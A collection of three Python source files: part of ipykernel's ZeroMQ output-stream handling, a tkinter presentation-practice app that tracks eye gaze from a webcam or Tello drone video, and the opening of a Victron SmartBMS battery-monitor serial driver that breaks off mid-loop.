"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
# close *all* event pipes, created in any thread
# event pipes can only be used from other threads while self.thread.is_alive()
# so after thread.join, this should be safe
for event_pipe in self._event_pipes:
event_pipe.close()
def close(self):
if self.closed:
return
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
self._events.append(f)
# wake event thread (message content is ignored)
self._event_pipe.send(b'')
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda : self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket(object):
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith('__') and attr.endswith('__'):
# don't wrap magic methods
super(BackgroundSocket, self).__getattr__(attr)
if hasattr(self.io_thread.socket, attr):
warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
return getattr(self.io_thread.socket, attr)
super(BackgroundSocket, self).__getattr__(attr)
def __setattr__(self, attr, value):
if attr == 'io_thread' or (attr.startswith('__') and attr.endswith('__')):
super(BackgroundSocket, self).__setattr__(attr, value)
else:
warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# timeout for flush to avoid infinite hang
# in case of misbehavior
flush_timeout = 10
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = 'UTF-8'
def fileno(self):
"""
Things like subprocess will peek and write to the fileno() of stderr/stdout.
"""
if getattr(self, "_original_stdstream_copy", None) is not None:
return self._original_stdstream_copy
else:
raise io.UnsupportedOperation("fileno")
def _watch_pipe_fd(self):
"""
We've redirected standard streams 0 and 1 into a pipe.
We need to watch in a thread and redirect them to the right places.
1) the ZMQ channels to show in notebook interfaces,
2) the original stdout/err, to capture errors in terminals.
We cannot schedule this on the ioloop thread, as this might be blocking.
"""
try:
bts = os.read(self._fid, 1000)
while bts and self._should_watch:
self.write(bts.decode())
os.write(self._original_stdstream_copy, bts)
bts = os.read(self._fid, 1000)
except Exception:
self._exc = sys.exc_info()
def __init__(
self, session, pub_thread, name, pipe=None, echo=None, *, watchfd=True, isatty=False,
):
"""
Parameters
----------
name : str {'stderr', 'stdout'}
the name of the standard stream to replace
watchfd : bool (default, True)
Watch the file descriptor corresponding to the replaced stream.
This is useful if you know some underlying code will write directly
to the file descriptor by its number. It will spawn a watching thread
that will swap the given file descriptor for a pipe, read from the
pipe, and insert this into the current Stream.
isatty : bool (default, False)
Indication of whether this stream has terminal capabilities (e.g. can handle colors)
"""
if pipe is not None:
warnings.warn(
"pipe argument to OutStream is deprecated and ignored "
"since ipykernel 4.2.3.",
DeprecationWarning,
stacklevel=2,
)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn(
"Since IPykernel 4.3, OutStream should be created with "
"IOPubThread, not %r" % pub_thread,
DeprecationWarning,
stacklevel=2,
)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b"stream." + name.encode()
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._subprocess_flush_pending = False
self._io_loop = pub_thread.io_loop
self._new_buffer()
self.echo = None
self._isatty = bool(isatty)
if (
watchfd
and (sys.platform.startswith("linux") or sys.platform.startswith("darwin"))
and ("PYTEST_CURRENT_TEST" not in os.environ)
):
# Pytest sets its own capture. Don't redirect from within pytest.
self._should_watch = True
self._setup_stream_redirects(name)
if echo:
if hasattr(echo, 'read') and hasattr(echo, 'write'):
self.echo = echo
else:
raise ValueError("echo argument must be a file like object")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Returns:
Boolean
"""
return self._isatty
def _setup_stream_redirects(self, name):
pr, pw = os.pipe()
fno = getattr(sys, name).fileno()
self._original_stdstream_copy = os.dup(fno)
os.dup2(pw, fno)
self._fid = pr
self._exc = None
self.watch_fd_thread = threading.Thread(target=self._watch_pipe_fd)
self.watch_fd_thread.daemon = True
self.watch_fd_thread.start()
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
if sys.platform.startswith("linux") or sys.platform.startswith("darwin"):
self._should_watch = False
self.watch_fd_thread.join()
if self._exc:
etype, value, tb = self._exc
traceback.print_exception(etype, value, tb)
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if self.pub_thread and self.pub_thread.thread is not None and self.pub_thread.thread.is_alive():
# request flush on the background thread
self.pub_thread.schedule(self._flush)
# wait for flush to actually get through, if we can.
# waiting across threads during import can cause deadlocks
# so only wait if import lock is not held
if not import_lock_held():
evt = threading.Event()
self.pub_thread.schedule(evt.set)
# and give a timeout to avoid blocking forever
if not evt.wait(self.flush_timeout):
# write directly to __stderr__ instead of warning because
# if this is happening sys.stderr may be the problem.
print("IOStream.flush timed out", file=sys.__stderr__)
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
self._subprocess_flush_pending = False
if self.echo is not None:
try:
self.echo.flush()
except OSError as e:
if self.echo is not sys.__stderr__:
print("Flush failed: {}".format(e),
file=sys.__stderr__)
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {'name':self.name, 'text':data}
self.session.send(self.pub_thread, 'stream', content=content,
parent=self.parent_header, ident=self.topic)
def write(self, string: str) -> int:
"""Write to current stream after encoding if necessary
Returns
-------
len : int
number of items from input parameter written to stream.
"""
if not isinstance(string, str):
raise ValueError(
"TypeError: write() argument must be str, not {type(string)}"
)
if self.echo is not None:
try:
self.echo.write(string)
except OSError as e:
if self.echo is not sys.__stderr__:
print("Write failed: {}".format(e),
file=sys.__stderr__)
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
is_child = (not self._is_master_process())
# only touch the buffer in the IO thread to avoid races
self.pub_thread.schedule(lambda: self._buffer.write(string))
if is_child:
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if self._subprocess_flush_pending:
return
self._subprocess_flush_pending = True
# We can not rely on self._io_loop.call_later from a subprocess
self.pub_thread.schedule(self._flush)
else:
self._schedule_flush()
return len(string)
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
for string in sequence:
self.write(string)
def writable(self):
return True
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data.
This should only be called in the IO thread.
"""
data = ''
if self._buffer is not None:
buf = self._buffer
self._new_buffer()
data = buf.getvalue()
buf.close()
return data
def _new_buffer(self):
self._buffer = StringIO()
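# A minimal sketch of how an OutStream is typically wired up (illustrative only;
# names other than those defined above are assumptions):
#
#   pub_thread = IOPubThread(pub_socket)   # pub_socket: a zmq.PUB socket
#   pub_thread.start()
#   sys.stdout = OutStream(session, pub_thread, 'stdout')
#   sys.stderr = OutStream(session, pub_thread, 'stderr')
#
# after which print() output is buffered, flushed on a 0.2 s interval in the IOPub
# thread, and published as 'stream' messages on the socket.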
|
test.py
|
from easytello import tello
import threading
import time
import sys
import socket
from tkinter import *
import tkinter as tk
from PIL import Image,ImageTk
import tkinter.messagebox
import cv2
import PIL.Image
from gaze_tracking import GazeTracking
root = tk.Tk()
root.title('湧泉相報系統')
root.geometry('1024x600')
root.configure(bg="#FBE5D6")
global button_function_train,button_history,show_top_bar,show_title,show_eye,show_drown,show_train_title,gaze,socket,tello_address
tello_ip = '192.168.10.1'
tello_port = 8889
tello_address = (tello_ip, tello_port)
socket = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)
socket.sendto('command'.encode('utf-8'), tello_address)
socket.sendto('streamon'.encode('utf-8'), tello_address)
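# Per the Tello SDK, 'command' switches the drone into SDK mode and 'streamon'
# starts the UDP video stream that drone_cam() reads below on port 11111.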
gaze = GazeTracking()
###############################################################################################
img_start_1 = Image.open("./image/top_bar.png")
img_start_2 = img_start_1.resize((1024,100),Image.ANTIALIAS)
img_start_3 = ImageTk.PhotoImage(img_start_2)
# Home page title image
img_title_1 = Image.open("./image/title.png")
img_title_2 = img_title_1.resize((450,90),Image.ANTIALIAS)
img_title_3 = ImageTk.PhotoImage(img_title_2)
# Eye icon
img_eye_1 = Image.open("./image/eye_icon.png")
img_eye_2 = img_eye_1.resize((150,90),Image.ANTIALIAS)
img_eye_3 = ImageTk.PhotoImage(img_eye_2)
# Drone icon
img_drown_1 = Image.open("./image/drown_icon.png")
img_drown_2 = img_drown_1.resize((150,90),Image.ANTIALIAS)
img_drown_3 = ImageTk.PhotoImage(img_drown_2)
# Training button
train_btn_1 = Image.open("./image/train_btn.png")
train_btn_2 = train_btn_1.resize((300,90),Image.ANTIALIAS)
train_btn_3 = ImageTk.PhotoImage(train_btn_2)
# History button
history_btn_1 = Image.open("./image/history.png")
history_btn_2 = history_btn_1.resize((300,90),Image.ANTIALIAS)
history_btn_3 = ImageTk.PhotoImage(history_btn_2)
################################################################################################
# Training mode
train_title_image = Image.open("./image/train_title.png").resize((450,90),Image.ANTIALIAS) #
train_title = ImageTk.PhotoImage(train_title_image)
# Back button icon
return_icon_1 = Image.open("./image/return_icon.png")
return_icon_2 = return_icon_1.resize((90,90),Image.ANTIALIAS)
return_icon = ImageTk.PhotoImage(return_icon_2)
# Home button icon
home_icon_1 = Image.open("./image/home_icon.png")
home_icon_2 = home_icon_1.resize((90,90),Image.ANTIALIAS)
home_icon = ImageTk.PhotoImage(home_icon_2)
# Confirm button icon
confirm_icon_1 = Image.open("./image/confirm_icon.png")
confirm_icon_2 = confirm_icon_1.resize((300,90),Image.ANTIALIAS)
confirm_icon = ImageTk.PhotoImage(confirm_icon_2)
###############################################################################################
# Report-judgment sidebar area
report_judgment_area_1 = Image.open("./image/report_judgment_area.png")
report_judgment_area_2 = report_judgment_area_1.resize((300,495),Image.ANTIALIAS)
report_judgment_area = ImageTk.PhotoImage(report_judgment_area_2)
# Start-report button
report_start_icon_1 = Image.open("./image/report_start_icon.png")
report_start_icon_2 = report_start_icon_1.resize((100,60),Image.ANTIALIAS)
report_start_icon = ImageTk.PhotoImage(report_start_icon_2)
# Finish-report button
report_finish_icon_1 = Image.open("./image/report_finish_icon.png")
report_finish_icon_2 = report_finish_icon_1.resize((100,60),Image.ANTIALIAS)
report_finish_icon = ImageTk.PhotoImage(report_finish_icon_2)
# Report title area
report_name_area_1 = Image.open("./image/report_name_area.png")
report_name_area_2 = report_name_area_1.resize((210,70),Image.ANTIALIAS)
report_name_area = ImageTk.PhotoImage(report_name_area_2)
# Judgment display area
judge_area_1 = Image.open("./image/judge_area.png")
judge_area_2 = judge_area_1.resize((170,70),Image.ANTIALIAS)
judge_area = ImageTk.PhotoImage(judge_area_2)
###############################################################################################
# Body-movement score display area
body_score_1 = Image.open("./image/body_score.png")
body_score_2 = body_score_1.resize((420,385),Image.ANTIALIAS)
body_score = ImageTk.PhotoImage(body_score_2)
# Eye-contact score display area
eye_score_1 = Image.open("./image/eye_score.png")
eye_score_2 = eye_score_1.resize((420,385),Image.ANTIALIAS)
eye_score = ImageTk.PhotoImage(eye_score_2)
###############################################################################################
# History page title
history_icon_1 = Image.open("./image/history_icon.png")
history_icon_2 = history_icon_1.resize((450,90),Image.ANTIALIAS)
history_icon = ImageTk.PhotoImage(history_icon_2)
# History report button image
report_history_btn_1 = Image.open("./image/report_history_btn.png")
report_history_btn_2 = report_history_btn_1.resize((400,140),Image.ANTIALIAS)
report_history_btn = ImageTk.PhotoImage(report_history_btn_2)
###############################################################################################
show_top_bar = tk.Label(root, image=img_start_3)
show_title = tk.Label(root, image=img_title_3, bg="#FFD966")
show_eye = tk.Label(root, image=img_eye_3, bg="#FFD966")
show_drown = tk.Label(root, image=img_drown_3, bg="#FFD966")
global g
g=0
panel_for_trt = tk.Label(root,height=500,width=720,bg="#000000") # initialize image panel2
def drone():
my_drone = tello.Tello()
my_drone.takeoff()
for i in range(4):
my_drone.forward(10)
my_drone.cw(90)
my_drone.land()
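# drone(): take off, fly a small square (4 x forward plus 90-degree clockwise turns),
# then land, while the video stream is analysed in a separate thread (see do_drone).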
def open_cam():
global cap
# camera
width, height = 720, 500
cap = cv2.VideoCapture(0)
if not cap.isOpened():
print("Camera Open Error")
sys.exit(0)
def drone_cam():
global capture
# camera
print ("Start streaming")
capture = cv2.VideoCapture ('udp:/0.0.0.0:11111',cv2.CAP_FFMPEG)
capture.open('udp:/0.0.0.0:11111')
def drone_stream():
global panel_for_trt,imgtk,gaze,socket,tello_address,capture
ret, frame =capture.read()
gaze.refresh(frame)
frame = gaze.annotated_frame()
text = ""
if gaze.is_blinking():
text = "Blinking"
elif gaze.is_right():
text = "Looking right"
elif gaze.is_left():
text = "Looking left"
elif gaze.is_center():
text = "Looking center"
cv2.putText(frame, text, (90, 60), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
left_pupil = gaze.pupil_left_coords()
right_pupil = gaze.pupil_right_coords()
cv2.putText(frame, "Left pupil: " + str(left_pupil), (90, 130), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
cv2.putText(frame, "Right pupil: " + str(right_pupil), (90, 165), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
img = cv2.resize(frame, dsize=(720, 500), interpolation=cv2.INTER_AREA)
cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)  # convert color from BGR to RGBA
current_image = PIL.Image.fromarray(cv2image)  # convert the array into a PIL Image object
imgtk = PIL.ImageTk.PhotoImage(image=current_image)
panel_for_trt.imgtk = imgtk
panel_for_trt.config(image=imgtk)
root.after(1, drone_stream)
def vid_stream():
global panel_for_trt,imgtk,g,gaze,cap
success,img = cap.read()
# We send this frame to GazeTracking to analyze it
gaze.refresh(img)
img = gaze.annotated_frame()
text = ""
if gaze.is_blinking():
text = "Blinking"
elif gaze.is_right():
text = "Looking right"
elif gaze.is_left():
text = "Looking left"
elif gaze.is_center():
text = "Looking center"
cv2.putText(img, text, (90, 60), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
left_pupil = gaze.pupil_left_coords()
right_pupil = gaze.pupil_right_coords()
cv2.putText(img, "Left pupil: " + str(left_pupil), (90, 130), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
cv2.putText(img, "Right pupil: " + str(right_pupil), (90, 165), cv2.FONT_HERSHEY_DUPLEX, 0.9, (147, 58, 31), 1)
img = cv2.resize(img, dsize=(720, 500), interpolation=cv2.INTER_AREA)
cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)  # convert color from BGR to RGBA
current_image = PIL.Image.fromarray(cv2image)  # convert the array into a PIL Image object
imgtk = PIL.ImageTk.PhotoImage(image=current_image)
panel_for_trt.imgtk = imgtk
panel_for_trt.config(image=imgtk)
root.after(1, vid_stream)
def del_cap():
global cap,imgtk
cap.release()
imgtk=""
def del_drone_cap():
global capture,imgtk
capture.release()
imgtk=""
def del_main():
global button_function_train,button_history,show_top_bar,show_title,show_eye,show_drown
button_function_train.place_forget(),button_history.place_forget(),show_title.place_forget(),show_eye.place_forget(),show_drown.place_forget()
def do_usb_cam():
t1 = threading.Thread(target = vid_stream)
# t2 = threading.Thread(target = drone)
t1.start()
# t2.start()
def do_drone():
t3 = threading.Thread(target = drone_stream)
t4 = threading.Thread(target = drone)
t3.start()
t4.start()
def choose_delcam(radio_val):
if radio_val == 1:
del_cap()
elif radio_val == 2:
del_drone_cap()
def choose_cam(radio_val):
if radio_val == 1:
open_cam()
vid_stream()
elif radio_val == 2:
drone_cam()
drone_stream()
else:
messagebox = tkinter.messagebox.showinfo('警告','請選擇畫面呈現影像')
def del_train_init_page():
global show_train_title,button_return_icon,button_home_icon,button_confirm_icon,text,content
show_train_title.place_forget(),button_return_icon.place_forget(),button_home_icon.place_forget(),button_confirm_icon.place_forget(),text.place_forget(),
content.place_forget()
def del_train_start_page():
global show_report_judgment_area,button_return_icon,button_home_icon,panel_for_trt,show_train_title,report_start_icon_btn,report_finish_icon_btn,show_report_name_area
global show_judge_area_fun1,show_judge_area_fun2,show_title,fun1_text,fun2_text,drone_sel,cam_sel,radio_text
show_report_judgment_area.place_forget(),button_return_icon.place_forget(),button_home_icon.place_forget(),panel_for_trt.place_forget(),
show_train_title.place_forget(),report_start_icon_btn.place_forget(),report_finish_icon_btn.place_forget(),show_report_name_area.place_forget(),
show_judge_area_fun1.place_forget(),show_judge_area_fun2.place_forget(),show_title.place_forget(),drone_sel.place_forget(),cam_sel.place_forget(),radio_text.place_forget()
del fun1_text,fun2_text
def del_train_finish_page():
global button_return_icon,button_home_icon,show_train_title,show_eye_score,show_body_score
button_return_icon.place_forget(),button_home_icon.place_forget(),show_train_title.place_forget(),show_eye_score.place_forget(),show_body_score.place_forget()
def del_history_init_page():
global show_history_icon,button_return_icon,button_home_icon,report_history_btn1,report_history_btn2,report_history_btn3,report_history_btn4
show_history_icon.place_forget(),button_return_icon.place_forget(),button_home_icon.place_forget(),report_history_btn1.place_forget(),
report_history_btn2.place_forget(),report_history_btn3.place_forget(),report_history_btn4.place_forget()
# Topic-entry page
def train_init_page():
global show_train_title,button_return_icon,button_home_icon,button_confirm_icon,text,content,theme_var
show_train_title = tk.Label(root,bg="#FFD966", image = train_title)
button_return_icon= tk.Button(root, image=return_icon,bg="#FFD966",command=lambda:[del_train_init_page(),main()], activebackground="#FFD966",bd=0)
button_home_icon= tk.Button(root, image=home_icon,bg="#FFD966",command=lambda:[del_train_init_page(),main()], activebackground="#FFD966",bd=0)
#
button_confirm_icon= tk.Button(root, image=confirm_icon,bg="#FBE5D6",command=lambda:[del_train_init_page(),train_start_page(content.get())], activebackground="#FBE5D6",bd=0)
#
show_train_title.place(x=285,y=5)
button_return_icon.place(x=20,y=5)
button_home_icon.place(x=900,y=5)
button_confirm_icon.place(x=360, y=344)
# Input field
text = tk.Label(root,font=("Calibri",36), text='請輸入報告主題',bg="#FBE5D6")
text.place(x=345, y=180)
theme_var = tk.StringVar()
content = tk.Entry(root,textvariable=theme_var, bd=3,width=16,font=("Calibri",36))
content.place(x=320, y=267)
# Report start page
def train_start_page(theme_value):
global theme_var,cap
if theme_value == "":
train_init_page()
messagebox = tkinter.messagebox.showinfo('警告','請輸入報告主題')
else:
i = 0
global show_report_judgment_area,button_return_icon,button_home_icon,panel_for_trt,show_train_title,report_start_icon_btn,report_finish_icon_btn,show_report_name_area
global show_judge_area_fun1,show_judge_area_fun2,show_title,show_fun1,show_fun2,fun1_text,fun2_text,drone_sel,cam_sel,radio_text,radio_val
show_train_title = tk.Label(root,bg="#FFD966", image = train_title)
show_report_judgment_area = tk.Label(root,bg="#FBE5D6", image = report_judgment_area)
button_return_icon= tk.Button(root, image=return_icon,bg="#FFD966",command=lambda:[del_train_start_page(),main()], activebackground="#FFD966",bd=0)
button_home_icon= tk.Button(root, image=home_icon,bg="#FFD966",command=lambda:[del_train_start_page(),main()], activebackground="#FFD966",bd=0)
report_start_icon_btn = tk.Button(root, image=report_start_icon, bg="#FFF2CC",command=lambda:[drone_cam(),do_drone()], activebackground="#FFF2CC",bd=0)
report_finish_icon_btn = tk.Button(root, image=report_finish_icon, bg="#FFF2CC",command=lambda:[choose_delcam(radio_val.get()),del_train_start_page(),train_finish_page()], activebackground="#FFF2CC",bd=0)
show_report_name_area = tk.Label(root,bg="#FFF2CC", image = report_name_area)
show_judge_area_fun1 = tk.Label(root,bg="#FFF2CC", image = judge_area)
show_judge_area_fun2 = tk.Label(root,bg="#FFF2CC", image = judge_area)
show_title = tk.Label(show_report_name_area,bg="#F4B183",text=theme_value,font=("Calibri",26))
fun1_text = tk.StringVar()
fun1_text.set("眼神偏移次數:0")
fun2_text = tk.StringVar()
fun2_text.set("身體晃動次數:0")
show_fun1 = tk.Label(show_judge_area_fun1,bg="#FBE5D6",textvariable=fun1_text,font=("Calibri",14))
show_fun2 = tk.Label(show_judge_area_fun2,bg="#FBE5D6",textvariable=fun2_text,font=("Calibri",14))
show_train_title.place(x=285,y=5)
button_return_icon.place(x=20,y=5)
button_home_icon.place(x=900,y=5)
show_report_judgment_area.place(x=0,y=102)
show_report_name_area.place(x=45,y=140)
show_judge_area_fun1.place(x=63,y=230)
show_judge_area_fun2.place(x=63,y=330)
report_start_icon_btn.place(x=30,y=520)
report_finish_icon_btn.place(x=170,y=520)
panel_for_trt.place(x=304,y=102)
show_title.place(x=10,y=10)
show_fun1.place(x=10,y=17)
show_fun2.place(x=10,y=17)
radio_val = IntVar()
def ShowChoice():
print (radio_val.get())
radio_text=tk.Label(root,
text="請選擇呈現影像",bg="#FFF2CC")
drone_sel=Radiobutton(root,
text="攝影機影像",
padx = 20,
indicatoron=0,
variable=radio_val,
bg="#FFF2CC",
value=1)
cam_sel=Radiobutton(root,
text="空拍機影像",
padx = 20,
indicatoron=0,
variable=radio_val,
bg="#FFF2CC",
value=2)
radio_text.place(x=100,y=450)
drone_sel.place(x=45,y=480)
cam_sel.place(x=145,y=480)
theme_var=""
# Report finish page
def train_finish_page():
global button_return_icon,button_home_icon,show_train_title,show_eye_score,show_body_score
show_train_title = tk.Label(root,bg="#FFD966", image = train_title)
button_return_icon= tk.Button(root, image=return_icon,bg="#FFD966",command=lambda:[del_train_finish_page(),main()], activebackground="#FFD966",bd=0)
button_home_icon= tk.Button(root, image=home_icon,bg="#FFD966",command=lambda:[del_train_finish_page(),main()], activebackground="#FFD966",bd=0)
show_body_score = tk.Label(root,bg="#FBE5D6", image = body_score)
show_eye_score = tk.Label(root,bg="#FBE5D6", image = eye_score)
show_train_title.place(x=285,y=5)
button_return_icon.place(x=20,y=5)
button_home_icon.place(x=900,y=5)
show_eye_score.place(x=550,y=160)
show_body_score.place(x=50,y=160)
def history_init_page():
global show_history_icon,button_return_icon,button_home_icon,report_history_btn1,report_history_btn1,report_history_btn2,report_history_btn3,report_history_btn4
show_history_icon = tk.Label(root,bg="#FFD966", image = history_icon)
button_return_icon= tk.Button(root, image=return_icon,bg="#FFD966",command=lambda:[del_history_init_page(),main()], activebackground="#FFD966",bd=0)
button_home_icon= tk.Button(root, image=home_icon,bg="#FFD966",command=lambda:[del_history_init_page(),main()], activebackground="#FFD966",bd=0)
report_history_btn1 = tk.Button(root, image=report_history_btn,bg="#FBE5D6",command=lambda:[del_history_init_page(),main()], activebackground="#FBE5D6",bd=0)
report_history_btn2 = tk.Button(root, image=report_history_btn,bg="#FBE5D6",command=lambda:[del_history_init_page(),main()], activebackground="#FBE5D6",bd=0)
report_history_btn3 = tk.Button(root, image=report_history_btn,bg="#FBE5D6",command=lambda:[del_history_init_page(),main()], activebackground="#FBE5D6",bd=0)
report_history_btn4 = tk.Button(root, image=report_history_btn,bg="#FBE5D6",command=lambda:[del_history_init_page(),main()], activebackground="#FBE5D6",bd=0)
show_history_icon.place(x=285,y=5)
button_return_icon.place(x=20,y=5)
button_home_icon.place(x=900,y=5)
report_history_btn1.place(x=70 ,y=180)
report_history_btn2.place(x=70 ,y=380)
report_history_btn3.place(x=550 ,y=180)
report_history_btn4.place(x=550 ,y=380)
def main():
global button_function_train,button_history,show_top_bar,show_title,show_eye,show_drown
button_function_train= tk.Button(root, image=train_btn_3,bg="#FBE5D6",command=lambda:[del_main(),train_init_page()], activebackground="#FBE5D6",bd=0)
button_history= tk.Button(root, image=history_btn_3,bg="#FBE5D6",command=lambda:[del_main(),history_init_page()], activebackground="#FBE5D6",bd=0)
show_title = tk.Label(root,bg="#FFD966", image = img_title_3)
show_top_bar.place(x=-2,y=0)
show_title.place(x=285,y=5)
show_eye.place(x=20,y=5)
show_drown.place(x=850,y=3)
button_function_train.place(x=360, y=222)
button_history.place(x=360, y=377)
main()
root.mainloop()
|
smartbms.py
|
#!/usr/bin/env python3
import argparse
import os
import serial
import serial.tools.list_ports
import struct
import sys
import threading
import time
from collections import deque
from datetime import datetime
from dbus.mainloop.glib import DBusGMainLoop
from gi.repository import GLib
# Victron packages
sys.path.insert(1, os.path.join(os.path.dirname(__file__), '/opt/victronenergy/dbus-systemcalc-py/ext/velib_python'))
import dbus.service
import ve_utils
from vedbus import VeDbusService
from settingsdevice import SettingsDevice
class SmartBMS:
BMS_COMM_TIMEOUT = 10 # Seconds
BMS_COMM_BLOCK_SIZE = 58
def __init__(
self,
dev
):
self.last_received = 0
self.pack_voltage = 0
self.charge_current = 0
self.discharge_current = 0
self.pack_current = 0
self.soc = 0
self.lowest_cell_voltage = 0
self.lowest_cell_voltage_num = 0
self.highest_cell_voltage = 0
self.highest_cell_voltage_num = 0
self.lowest_cell_temperature = 0
self.lowest_cell_temperature_num = 0
self.highest_cell_temperature = 0
self.highest_cell_temperature_num = 0
self.cell_count = 0
self.capacity = 0
self.energy_stored = 0
self.balance_voltage = 0
self.alarm_minimum_voltage = 0
self.alarm_maximum_voltage = 0
self.alarm_minimum_temperature = 0
self.alarm_maximum_temperature = 0
self.alarm_cell_communication = 0
self.allowed_to_charge = 0
self.allowed_to_discharge = 0
self.lock = threading.Lock()
self._poller = threading.Thread(target=lambda:self._poll(dev))
self._poller.daemon = True
self._poller.start()
@property
def alarm_serial_communication(self):
if(time.time() > self.last_received + self.BMS_COMM_TIMEOUT):
return True
else:
return False
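# Map the configured balance (full-charge) voltage to a nominal cell voltage.
# The three ranges roughly correspond to LiFePO4, Li-ion/NMC and LTO cells
# (assumption based on the values below); 0 is returned when no range matches.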
def determine_nominal_voltage(self):
if(self.balance_voltage >= 3.4 and self.balance_voltage <= 3.6): return 3.3
if(self.balance_voltage >= 3.9 and self.balance_voltage <= 4.4): return 3.65
if(self.balance_voltage >= 2.5 and self.balance_voltage <= 2.7): return 2.3
return 0
def _poll(self, dev, test_packet = ''):
try:
# The SmartBMS transmit each 500ms or 1000ms a message containing 58 bytes
# When the serial does not contain any new bytes and no complete message was received, empty the buffer and wait for a new message
#logging.debug("Parse Packet [" + str(len(packet)) + "] bytes")
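# The last byte of each 58-byte block is an additive checksum: the low byte
# of the sum of the first 57 bytes (verified below before parsing).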
buffer = bytearray (self.BMS_COMM_BLOCK_SIZE)
buffer_index = 0
time.sleep(1)
self._ser = serial.Serial(dev, 9600)
while(1):
if (len(test_packet) > 0):
read_data = test_packet
else:
waiting_bytes = self._ser.in_waiting
read_data = self._ser.read(waiting_bytes)
if(len(read_data) > 0):
for c in read_data:
if(buffer_index <= self.BMS_COMM_BLOCK_SIZE-1):
buffer[buffer_index] = c
buffer_index += 1
if(buffer_index == self.BMS_COMM_BLOCK_SIZE):
checksum = 0
for i in range (self.BMS_COMM_BLOCK_SIZE-1):
checksum += buffer[i]
received_checksum = buffer[self.BMS_COMM_BLOCK_SIZE-1]
if((checksum & 0xff) == received_checksum):
self.lock.acquire()
self.pack_voltage = self._decode_voltage(buffer[0:3])
self.charge_current = self._decode_current(buffer[3:6])
self.discharge_current = self._decode_current(buffer[6:9])
self.pack_current = self._decode_current(buffer[9:12])
self.soc = buffer[40]
self.lowest_cell_voltage = self._decode_voltage(buffer[12:14])
self.lowest_cell_voltage_num = buffer[14]
self.highest_cell_voltage = self._decode_voltage(buffer[15:17])
self.highest_cell_voltage_num = buffer[17]
self.lowest_cell_temperature = self._decode_temperature(buffer[18:20])
self.lowest_cell_temperature_num = buffer[20]
self.highest_cell_temperature = self._decode_temperature(buffer[21:23])
self.highest_cell_temperature_num = buffer[23]
self.cell_count = buffer[25]
self.capacity = self._decode_value(buffer[49:51], 0.1)
self.energy_stored = self._decode_value(buffer[34:37], 1)
self.balance_voltage = self._decode_voltage(buffer[55:57])
self.alarm_minimum_voltage = True if (buffer[30] & 0b00001000) else False
self.alarm_maximum_voltage = True if (buffer[30] & 0b00010000) else False
self.alarm_minimum_temperature = True if (buffer[30] & 0b00100000) else False
self.alarm_maximum_temperature = True if (buffer[30] & 0b01000000) else False
self.alarm_cell_communication = True if (buffer[30] & 0b00000100) else False
self.allowed_to_discharge = True if (buffer[30] & 0b00000010) else False
self.allowed_to_charge = True if (buffer[30] & 0b00000001) else False
self.last_received = time.time()
self.lock.release()
buffer_index = 0
elif(len(read_data) == 0):
